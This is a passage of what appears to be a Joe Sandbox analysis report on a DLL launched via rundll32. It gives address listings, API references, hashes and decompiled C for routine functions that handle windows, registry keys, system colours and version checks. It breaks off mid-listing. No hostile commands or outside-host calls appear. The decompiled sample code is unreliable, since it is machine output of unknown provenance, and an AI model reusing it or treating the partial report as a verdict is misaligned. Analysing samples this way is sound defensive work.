                                                                                                                                                                            0x1000aebf
                                                                                                                                                                            0x1000aec1
                                                                                                                                                                            0x1000aec3
                                                                                                                                                                            0x1000aec4
                                                                                                                                                                            0x100142c8
                                                                                                                                                                            0x100142ca
                                                                                                                                                                            0x100142cd
                                                                                                                                                                            0x100142cf
                                                                                                                                                                            0x100142f1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100142d1
                                                                                                                                                                            0x100142d1
                                                                                                                                                                            0x100142d6
                                                                                                                                                                            0x100142d8
                                                                                                                                                                            0x100142e9
                                                                                                                                                                            0x100142e9
                                                                                                                                                                            0x100142f0
                                                                                                                                                                            0x100142f0
                                                                                                                                                                            0x1000aec6
                                                                                                                                                                            0x10014229
                                                                                                                                                                            0x10014229
                                                                                                                                                                            0x1001422a
                                                                                                                                                                            0x1001422b
                                                                                                                                                                            0x1001422c
                                                                                                                                                                            0x1001422d
                                                                                                                                                                            0x1001422e
                                                                                                                                                                            0x10014232
                                                                                                                                                                            0x10014238
                                                                                                                                                                            0x1001423e
                                                                                                                                                                            0x10014257
                                                                                                                                                                            0x10014257
                                                                                                                                                                            0x10014259
                                                                                                                                                                            0x1001425b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001424b
                                                                                                                                                                            0x1001424d
                                                                                                                                                                            0x1001424f
                                                                                                                                                                            0x100142c1
                                                                                                                                                                            0x100142c6
                                                                                                                                                                            0x10014251
                                                                                                                                                                            0x10014252
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014252
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001424f
                                                                                                                                                                            0x1001425d
                                                                                                                                                                            0x10014275
                                                                                                                                                                            0x10014275
                                                                                                                                                                            0x10014277
                                                                                                                                                                            0x10014279
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014269
                                                                                                                                                                            0x1001426b
                                                                                                                                                                            0x1001426d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001426f
                                                                                                                                                                            0x10014270
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014270
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001426d
                                                                                                                                                                            0x1001427b
                                                                                                                                                                            0x1001427f
                                                                                                                                                                            0x10014284
                                                                                                                                                                            0x10014286
                                                                                                                                                                            0x10014290
                                                                                                                                                                            0x100142a7
                                                                                                                                                                            0x100142a7
                                                                                                                                                                            0x100142a9
                                                                                                                                                                            0x100142ab
                                                                                                                                                                            0x100142ac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001429b
                                                                                                                                                                            0x1001429d
                                                                                                                                                                            0x1001429f
                                                                                                                                                                            0x100142a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100142a2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001429f
                                                                                                                                                                            0x100142bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014288
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014288
                                                                                                                                                                            0x10014286
                                                                                                                                                                            0x1000aeb0
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
                                                                                                                                                                            0x1000a0ef
                                                                                                                                                                            0x1000a0f4
                                                                                                                                                                            0x1000a0f5
                                                                                                                                                                            0x1000a0fc
                                                                                                                                                                            0x1000a10b
                                                                                                                                                                            0x1000a10d
                                                                                                                                                                            0x1000a110
                                                                                                                                                                            0x1000a114
                                                                                                                                                                            0x1000a117
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a119
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000a123
                                                                                                                                                                            0x1000ae91
                                                                                                                                                                            0x1000ae91
                                                                                                                                                                            0x1000ae96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ae9d
                                                                                                                                                                            0x1000aea3
                                                                                                                                                                            0x1000aea3
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCapture.USER32 ref: 10014232
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001424B
                                                                                                                                                                            • GetFocus.USER32(?,?,?,?,00000000), ref: 1001425D
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10014269
                                                                                                                                                                            • GetLastActivePopup.USER32(?), ref: 10014290
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001429B
                                                                                                                                                                            • SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 100142BF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3219385341-0
                                                                                                                                                                            • Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                                                                                            • Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
                                                                                                                                                                            • Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
                                                                                                                                                                            • Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1000FC8A(intOrPtr* __ecx) {
                                                                                                                                                                            				struct HWND__* _v40;
                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                            				void* _v52;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				long _t43;
                                                                                                                                                                            				struct HWND__* _t48;
                                                                                                                                                                            				long _t61;
                                                                                                                                                                            				intOrPtr* _t63;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				void* _t69;
                                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                            
                                                                                                                                                                            				_t72 = __ecx;
                                                                                                                                                                            				_t69 = E1000B510();
                                                                                                                                                                            				if(_t69 != 0) {
                                                                                                                                                                            					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                                                                                            						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                                                                                            						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                                                                                            				if(_t63 != 0) {
                                                                                                                                                                            					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                                                                                            					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t64 =  *(_t72 + 0x4c);
                                                                                                                                                                            				if(_t64 != 0) {
                                                                                                                                                                            					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                                                                                                                                                                            				_t83 =  *(_t72 + 0x3c) & 1;
                                                                                                                                                                            				if(( *(_t72 + 0x3c) & 1) != 0) {
                                                                                                                                                                            					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
                                                                                                                                                                            					if(_t71 != 0) {
                                                                                                                                                                            						_t85 =  *(_t71 + 0x20);
                                                                                                                                                                            						if( *(_t71 + 0x20) != 0) {
                                                                                                                                                                            							E100174D0(_t71,  &_v52, 0, 0x30);
                                                                                                                                                                            							_t48 =  *(_t72 + 0x20);
                                                                                                                                                                            							_v44 = _t48;
                                                                                                                                                                            							_v40 = _t48;
                                                                                                                                                                            							_v52 = 0x28;
                                                                                                                                                                            							_v48 = 1;
                                                                                                                                                                            							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                                                                                                                                                                            				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
                                                                                                                                                                            				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
                                                                                                                                                                            					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
                                                                                                                                                                            					if(_t43 != 0) {
                                                                                                                                                                            						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				E1000FBD6(_t61, _t72);
                                                                                                                                                                            				return  *((intOrPtr*)( *_t72 + 0x114))();
                                                                                                                                                                            			}



















                                                                                                                                                                            0x1000fc93
                                                                                                                                                                            0x1000fc9a
                                                                                                                                                                            0x1000fca0
                                                                                                                                                                            0x1000fca5
                                                                                                                                                                            0x1000fcca
                                                                                                                                                                            0x1000fcca
                                                                                                                                                                            0x1000fcd0
                                                                                                                                                                            0x1000fcd2
                                                                                                                                                                            0x1000fcd2
                                                                                                                                                                            0x1000fcd0
                                                                                                                                                                            0x1000fcd5
                                                                                                                                                                            0x1000fcda
                                                                                                                                                                            0x1000fcde
                                                                                                                                                                            0x1000fce1
                                                                                                                                                                            0x1000fce1
                                                                                                                                                                            0x1000fce4
                                                                                                                                                                            0x1000fcec
                                                                                                                                                                            0x1000fcf1
                                                                                                                                                                            0x1000fcf1
                                                                                                                                                                            0x1000fcf4
                                                                                                                                                                            0x1000fcf8
                                                                                                                                                                            0x1000fcfb
                                                                                                                                                                            0x1000fd02
                                                                                                                                                                            0x1000fd07
                                                                                                                                                                            0x1000fd09
                                                                                                                                                                            0x1000fd0d
                                                                                                                                                                            0x1000fd17
                                                                                                                                                                            0x1000fd1c
                                                                                                                                                                            0x1000fd22
                                                                                                                                                                            0x1000fd25
                                                                                                                                                                            0x1000fd36
                                                                                                                                                                            0x1000fd3d
                                                                                                                                                                            0x1000fd40
                                                                                                                                                                            0x1000fd40
                                                                                                                                                                            0x1000fd0d
                                                                                                                                                                            0x1000fd07
                                                                                                                                                                            0x1000fd56
                                                                                                                                                                            0x1000fd58
                                                                                                                                                                            0x1000fd67
                                                                                                                                                                            0x1000fd73
                                                                                                                                                                            0x1000fd77
                                                                                                                                                                            0x1000fd7f
                                                                                                                                                                            0x1000fd7f
                                                                                                                                                                            0x1000fd77
                                                                                                                                                                            0x1000fd87
                                                                                                                                                                            0x1000fd9a

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongWindow$MessageSend_memset
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 2997958587-3887548279
                                                                                                                                                                            • Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                                                                                            • Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013E40(intOrPtr __ecx) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* _v12;
                                                                                                                                                                            				void* _v16;
                                                                                                                                                                            				int _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                            
                                                                                                                                                                            				_t32 = __ecx;
                                                                                                                                                                            				_v24 = __ecx;
                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                                                                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					RegCloseKey(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v12 != 0) {
                                                                                                                                                                            					RegCloseKey(_v12);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _v16;
                                                                                                                                                                            			}









                                                                                                                                                                            0x10013e5b
                                                                                                                                                                            0x10013e62
                                                                                                                                                                            0x10013e65
                                                                                                                                                                            0x10013e68
                                                                                                                                                                            0x10013e6b
                                                                                                                                                                            0x10013e76
                                                                                                                                                                            0x10013ead
                                                                                                                                                                            0x10013ead
                                                                                                                                                                            0x10013eb8
                                                                                                                                                                            0x10013ebd
                                                                                                                                                                            0x10013ebd
                                                                                                                                                                            0x10013ec2
                                                                                                                                                                            0x10013ec7
                                                                                                                                                                            0x10013ec7
                                                                                                                                                                            0x10013ed0

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10013EBD
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10013EC7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreate$Open
                                                                                                                                                                            • String ID: software
                                                                                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                                                                                            • Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                                                                                            • Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
                                                                                                                                                                            • Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                                                                                            • Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E10013CEE(void* __ecx, long* __edi, void* __esi) {
                                                                                                                                                                            				long _t22;
                                                                                                                                                                            				void* _t23;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                            				long* _t40;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            
                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                            				_t40 = __edi;
                                                                                                                                                                            				_t31 = __ecx;
                                                                                                                                                                            				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                                                                                            				E10017C83(0, 0);
                                                                                                                                                                            				_t22 = E100134F9(_t31, 0, __edi[3], 4);
                                                                                                                                                                            				_t33 = 2;
                                                                                                                                                                            				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                                                                                            				_t46 = _t23;
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                                                                                            					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *(_t41 + 0xc) = _t23;
                                                                                                                                                                            				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                                                                                            				 *(_t41 + 8) = _t40[3];
                                                                                                                                                                            				TlsSetValue( *_t40, _t41);
                                                                                                                                                                            				_t35 =  *(_t42 + 8);
                                                                                                                                                                            				_t28 =  *(_t41 + 0xc);
                                                                                                                                                                            				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                                                                                            					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                                                                                            				}
                                                                                                                                                                            				_push( *(_t42 - 0x14));
                                                                                                                                                                            				LeaveCriticalSection();
                                                                                                                                                                            				return E10017C60(_t28);
                                                                                                                                                                            			}












                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cee
                                                                                                                                                                            0x10013cf5
                                                                                                                                                                            0x10013cff
                                                                                                                                                                            0x10013d0b
                                                                                                                                                                            0x10013d11
                                                                                                                                                                            0x10013d16
                                                                                                                                                                            0x10013d1c
                                                                                                                                                                            0x10013d1e
                                                                                                                                                                            0x10013d23
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d29
                                                                                                                                                                            0x10013d31
                                                                                                                                                                            0x10013d42
                                                                                                                                                                            0x10013d4e
                                                                                                                                                                            0x10013d53
                                                                                                                                                                            0x10013d59
                                                                                                                                                                            0x10013d5c
                                                                                                                                                                            0x10013d61
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6b
                                                                                                                                                                            0x10013d6e
                                                                                                                                                                            0x10013d74
                                                                                                                                                                            0x10013d7f

                                                                                                                                                                            APIs
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10013CFF
                                                                                                                                                                              • Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3
                                                                                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                                                                                              • Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB
                                                                                                                                                                            • _memset.LIBCMT ref: 10013D42
                                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 356813703-0
                                                                                                                                                                            • Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                                                                                            • Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
                                                                                                                                                                            • Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                                                                                            • Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10013810(void* __ecx) {
                                                                                                                                                                            				struct HBRUSH__* _t14;
                                                                                                                                                                            				void* _t18;
                                                                                                                                                                            
                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                                                                                            				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                                                                                            				_t14 = GetSysColorBrush(6);
                                                                                                                                                                            				 *(_t18 + 0x20) = _t14;
                                                                                                                                                                            				return _t14;
                                                                                                                                                                            			}





                                                                                                                                                                            0x1001381a
                                                                                                                                                                            0x10013820
                                                                                                                                                                            0x10013827
                                                                                                                                                                            0x1001382e
                                                                                                                                                                            0x10013835
                                                                                                                                                                            0x10013842
                                                                                                                                                                            0x10013849
                                                                                                                                                                            0x1001384c
                                                                                                                                                                            0x1001384f
                                                                                                                                                                            0x10013853

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 1001381C
                                                                                                                                                                            • GetSysColor.USER32(00000010), ref: 10013823
                                                                                                                                                                            • GetSysColor.USER32(00000014), ref: 1001382A
                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 10013831
                                                                                                                                                                            • GetSysColor.USER32(00000006), ref: 10013838
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 10013845
                                                                                                                                                                            • GetSysColorBrush.USER32(00000006), ref: 1001384C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Brush
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2798902688-0
                                                                                                                                                                            • Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                                                                                            • Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
                                                                                                                                                                            • Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                                                                                            • Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10028DE5() {
                                                                                                                                                                            				long _t5;
                                                                                                                                                                            				int _t6;
                                                                                                                                                                            
                                                                                                                                                                            				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                                                                                                                                            					_t5 = GetVersion();
                                                                                                                                                                            					if((0x80000000 & _t5) != 0) {
                                                                                                                                                                            						L5:
                                                                                                                                                                            						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
                                                                                                                                                                            						return _t5;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t5 = GetVersion();
                                                                                                                                                                            					if(_t5 != 3) {
                                                                                                                                                                            						goto L5;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                                                                                                                                                            					 *0x1005acc4 = _t6;
                                                                                                                                                                            					return _t6;
                                                                                                                                                                            				}
                                                                                                                                                                            			}





                                                                                                                                                                            0x10028df6
                                                                                                                                                                            0x10028e00
                                                                                                                                                                            0x10028e04
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e20
                                                                                                                                                                            0x10028e06
                                                                                                                                                                            0x10028e0c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e0e
                                                                                                                                                                            0x10028e0e
                                                                                                                                                                            0x10028e13
                                                                                                                                                                            0x10028e19
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10028e19

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
